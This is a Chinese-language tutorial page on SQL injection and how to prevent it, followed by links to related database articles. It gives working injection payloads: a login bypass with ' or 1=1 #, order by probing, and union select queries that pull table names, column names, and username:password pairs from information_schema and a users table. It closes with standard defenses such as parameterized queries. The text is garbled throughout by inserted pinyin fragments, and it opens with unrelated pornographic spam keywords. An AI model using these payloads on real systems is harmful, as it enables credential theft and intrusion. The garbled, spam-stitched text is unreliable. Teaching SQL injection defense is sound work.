欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

SQL注入的實(shí)現(xiàn)以及防范示例詳解

 更新時(shí)間:2021年06月02日 10:06:35   作者:還會(huì)見面嗎?  
SQL注入是比較常見的網(wǎng)絡(luò)攻擊方式之一,它不是利用操作系統(tǒng)的BUG來(lái)實(shí)現(xiàn)攻擊,而是針對(duì)程序員編寫時(shí)的疏忽,這篇文章主要給大家介紹了關(guān)于SQL注入的實(shí)現(xiàn)以及防范的相關(guān)資料,需要的朋友可以參考下

什么是SQL注入

SQL注入是指通過(guò)構(gòu)建特殊的輸入篡改原來(lái)的SQL語(yǔ)句達(dá)到攻擊者所需的操作。

Sql 注入產(chǎn)生原因

我們?cè)L問動(dòng)態(tài)網(wǎng)頁(yè)時(shí)往往會(huì)向服務(wù)器發(fā)送請(qǐng)求,服務(wù)器向數(shù)據(jù)訪問層發(fā)起 Sql 查詢請(qǐng)求,若驗(yàn)證通過(guò)就會(huì)執(zhí)行 Sql 語(yǔ)句。如果用戶輸入的數(shù)據(jù)被構(gòu)造成惡意Sql代碼,如果程序沒有細(xì)致地過(guò)濾用戶輸入的數(shù)據(jù)則會(huì)使非法數(shù)據(jù)侵入系統(tǒng)。

登錄案例講解

select * from admin where uname='用戶名' and pwd='密碼'

輸入 'or 1=1 #(–空格或–+或#:注釋掉后面的sql語(yǔ)句)

這時(shí)SQL語(yǔ)句變?yōu)椋?code>select * from admin where uname='' or 1=1 # and pwd='密碼',這時(shí)SQL語(yǔ)句永遠(yuǎn)成立,繞過(guò)登錄。

基于GET方式的SQL注入

通過(guò)在URL中修改對(duì)應(yīng)的ID值,為正常數(shù)字、大數(shù)字、字符(單引號(hào)、雙引號(hào)、雙單引號(hào)、括號(hào))、反斜杠來(lái)探測(cè)URL中是否有注入點(diǎn)。

可登陸到mituan.zone進(jìn)行測(cè)試

1、' '1'' LIMIT 0,1 ' :多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = 'id' limit 0,1

2、' ' LIMIT 0,1 ':多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = id limit 0,1

3、' '1'') LIMIT 0,1 ':多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = ('id') limit 0,1

4、單引號(hào)、括號(hào)都不報(bào)錯(cuò)說(shuō)明被接收的是字符串類型' "1"") LIMIT 0,1 ':多了一個(gè)雙引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = ("id") limit 0,1

SQL注入利用

1、利用order by判斷字段數(shù)

order by n(n為猜測(cè)字段數(shù))--+

以案例一為例

select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜測(cè)錯(cuò)誤時(shí)則會(huì)報(bào)錯(cuò)

此時(shí)探測(cè)到有3個(gè)字段,用?id=0' union select 1,2,3--+探測(cè)到Login_name在第二列,Password在第三列,則第二、三列可利用。

?id=0' union select 1,2,3--+2,3改為user():查看當(dāng)前MYSQL登錄用戶名,database():查看當(dāng)前使用MYSQL數(shù)據(jù)庫(kù)名,version():查看當(dāng)前MYSQL版本,如改為?id=0'union select 1,user(),database()--+ 得到下圖中信息

2、利用union select 聯(lián)合查詢,獲取表名。(在使用union select時(shí)要將前面的SQL語(yǔ)句報(bào)錯(cuò))

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

3、利用union select 聯(lián)合查詢,獲取字段名。(以上面查詢到的users表為例)

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

4、利用union select 聯(lián)合查詢,獲取字段值。(以上面查詢到的users表為例)

union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a為冒號(hào),用來(lái)分隔不同字段的值)

如果是地址欄不能顯示信息的POST形式則可以在對(duì)話框中輸入注入語(yǔ)句






這里使用的方法和在地址欄中的輸入一樣,都是先報(bào)錯(cuò)前面的SQL語(yǔ)句再使用union select聯(lián)合查詢拿出表中數(shù)據(jù)

SQL 注入的防范方法

  • 對(duì)用戶的輸入進(jìn)行過(guò)濾。如:對(duì)用戶的輸入進(jìn)行校驗(yàn),可以通過(guò)正則表達(dá)式、限制長(zhǎng)度、對(duì)單引號(hào)和雙"-"進(jìn)行轉(zhuǎn)換等。
  • 編寫程序時(shí)不要使用動(dòng)態(tài)拼裝sql,可以使用參數(shù)化的sql或者直接使用存儲(chǔ)過(guò)程進(jìn)行數(shù)據(jù)查詢存取。
  • 不要直接使用管理員權(quán)限的數(shù)據(jù)庫(kù)連接,每個(gè)應(yīng)用使用單獨(dú)的且權(quán)限有限的數(shù)據(jù)庫(kù)。
  • 不要把機(jī)密信息直接存放,加密或者h(yuǎn)ash掉密碼和敏感的信息。
  • 程序的異常信息應(yīng)該給出盡可能少的提示,最好使用自定義的錯(cuò)誤信息對(duì)原始錯(cuò)誤信息進(jìn)行包裝。

總結(jié)

到此這篇關(guān)于SQL注入的實(shí)現(xiàn)以及防范的文章就介紹到這了,更多相關(guān)SQL注入實(shí)現(xiàn)及防范內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • 達(dá)夢(mèng)數(shù)據(jù)庫(kù)如何設(shè)置自增主鍵的方法及注意事項(xiàng)

    達(dá)夢(mèng)數(shù)據(jù)庫(kù)如何設(shè)置自增主鍵的方法及注意事項(xiàng)

    這篇文章主要介紹了達(dá)夢(mèng)數(shù)據(jù)庫(kù)如何設(shè)置自增主鍵的方法及注意事項(xiàng)的相關(guān)資料,在達(dá)夢(mèng)數(shù)據(jù)庫(kù)中實(shí)現(xiàn)自增字段通常需要使用序列(sequence)和觸發(fā)器(trigger),需要的朋友可以參考下
    2024-09-09
  • 一文讀懂?dāng)?shù)據(jù)庫(kù)管理工具 Navicat 和 DBeaver

    一文讀懂?dāng)?shù)據(jù)庫(kù)管理工具 Navicat 和 DBeaver

    這篇文章主要介紹了數(shù)據(jù)庫(kù)管理工具 Navicat 和 DBeaver的相關(guān)資料,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2021-03-03
  • 用計(jì)算列實(shí)現(xiàn)移動(dòng)加權(quán)平均算法

    用計(jì)算列實(shí)現(xiàn)移動(dòng)加權(quán)平均算法

    昨天有人讓我?guī)兔憘€(gè)算移動(dòng)加權(quán)平均的SQL語(yǔ)句,我想了半天終于寫出來(lái)正確的了?,F(xiàn)在發(fā)出來(lái)供大家參考、討論。
    2009-09-09
  • 簡(jiǎn)單聊聊SQL注入的原理以及一般步驟

    簡(jiǎn)單聊聊SQL注入的原理以及一般步驟

    所謂SQL注入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁(yè)面請(qǐng)求的查詢字符串,欺騙服務(wù)器執(zhí)行惡意的SQL命令,下面這篇文章主要給大家介紹了關(guān)于SQL注入的原理以及一般步驟的相關(guān)資料,需要的朋友可以參考下
    2022-02-02
  • sqlserver中drop、truncate和delete語(yǔ)句的用法

    sqlserver中drop、truncate和delete語(yǔ)句的用法

    這篇文章主要介紹了sqlserver中drop、truncate和delete語(yǔ)句的用法,本文圖文并茂,內(nèi)容清晰,需要的朋友可以參考下
    2014-09-09
  • Navicat 導(dǎo)出導(dǎo)入數(shù)據(jù)庫(kù)的實(shí)現(xiàn)方法

    Navicat 導(dǎo)出導(dǎo)入數(shù)據(jù)庫(kù)的實(shí)現(xiàn)方法

    這篇文章主要介紹了Navicat 導(dǎo)出導(dǎo)入數(shù)據(jù)庫(kù)的實(shí)現(xiàn)方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-11-11
  • 你應(yīng)該知道的States字段使用規(guī)范

    你應(yīng)該知道的States字段使用規(guī)范

    這篇文章主要給大家介紹了一些大家應(yīng)該知道的States字段使用規(guī)范的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧。
    2017-12-12
  • hadoop map-reduce中的文件并發(fā)操作

    hadoop map-reduce中的文件并發(fā)操作

    hadoop mapreduce最主要的應(yīng)用是基于鍵值對(duì)的數(shù)據(jù)的運(yùn)算,過(guò)濾,提取。但除此之外,我們可以順帶利用mapreduce高并發(fā)的特性做一些用常用方法難以處理的問題,比如大量數(shù)據(jù),大量文件的并發(fā)讀寫
    2014-04-04
  • 時(shí)序數(shù)據(jù)庫(kù)VictoriaMetrics源碼解析之寫入與索引

    時(shí)序數(shù)據(jù)庫(kù)VictoriaMetrics源碼解析之寫入與索引

    這篇文章主要為大家介紹了VictoriaMetrics時(shí)序數(shù)據(jù)庫(kù)的寫入與索引源碼解析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-05-05
  • 一步步教你使用Navicat工具創(chuàng)建MySQL數(shù)據(jù)庫(kù)連接

    一步步教你使用Navicat工具創(chuàng)建MySQL數(shù)據(jù)庫(kù)連接

    Navicat是一套快速、可靠并價(jià)格相當(dāng)便宜的數(shù)據(jù)庫(kù)管理工具,專為簡(jiǎn)化數(shù)據(jù)庫(kù)的管理及降低系統(tǒng)管理成本而設(shè),下面這篇文章主要給大家介紹了關(guān)于如何使用Navicat工具創(chuàng)建MySQL數(shù)據(jù)庫(kù)連接的相關(guān)資料,需要的朋友可以參考下
    2023-03-03

最新評(píng)論